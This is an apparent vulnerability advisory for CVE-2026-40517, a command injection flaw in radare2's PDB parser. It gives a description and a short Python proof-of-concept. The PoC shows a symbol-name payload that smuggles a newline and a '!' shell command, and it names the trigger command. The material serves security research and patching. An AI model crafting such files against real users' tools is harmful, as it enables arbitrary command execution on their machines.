CVE-2026-40517

Published: 2026-04-22 22:16:31
Last Modified: 2026-04-27 17:04:26

Description

radare2 prior to 6.1.4 contains a command injection vulnerability in the PDB parser's print_gvars() function that allows attackers to execute arbitrary commands by crafting a malicious PDB file with newline characters in symbol names. Attackers can inject arbitrary radare2 commands through unsanitized symbol name interpolation in the flag rename command, which are then executed when a user runs the idp command against the malicious PDB file, enabling arbitrary OS command execution through radare2's shell execution operator.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2026-40517 # This script demonstrates the payload structure used to exploit the command injection. # The actual exploit requires embedding this payload into a PDB file's symbol name. # Malicious payload containing a newline and a radare2 shell command payload = "legit_symbol\n!touch /tmp/pwned" # In a real scenario, this payload would be injected into the symbol name # within a crafted PDB file. # When the victim runs: # r2 -c 'idp' malicious_file.pdb # The parser interprets the newline as a command separator. # The '!' tells radare2 to execute the rest via the system shell. print(f"Payload to inject into PDB symbol name: {repr(payload)}") print("Trigger: User runs 'idp' command on the malicious file in radare2.")
